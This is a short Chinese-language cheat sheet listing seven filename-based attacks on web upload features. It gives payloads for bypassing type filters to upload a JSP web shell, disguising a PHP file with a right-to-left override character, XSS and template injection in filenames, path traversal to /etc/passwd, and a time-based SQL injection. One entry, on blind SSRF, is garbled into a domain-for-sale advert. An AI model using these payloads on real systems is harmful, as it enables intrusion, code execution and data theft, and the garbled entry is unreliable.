第一种:如果对文件类型进行了过滤只能上传JPG,PNG的话可以对文件名进行编码
例子:image.jpg的话可以改成image.jpg%23.html可能会绕过文件类型
第二种:如果还是对文件类型进行了过滤可以尝试一下换行:
例子:1.FileName=shell.jspx.
jsp
2.File
Name=shell.jspx.jsp'
第三种:对文件修改成ip-v4.com domain is for sale | Buy with Epik.com可能会有惊喜(Blind SSRF)
第四种:尝试使用右到左覆盖,重命名上传的文件。比如说为namename.%E2%80%AEphp.jpg
,现在改为name.gpj.php
第五种:文件名可能会存在XSS把文件名修改成:'"><img src=x onerror=alert(document.domain)>.extension
或者 {{constructor.constructor('alert(1)')()}}.extension
第六种:可能会造成任意文件读取把文件名修改成:image.png../../../../../../../etc/passwd
第七种:可能会存在Time-Based SQLi修改文件名称:poc.js'(select*from(select(sleep(20)))a)+'.extension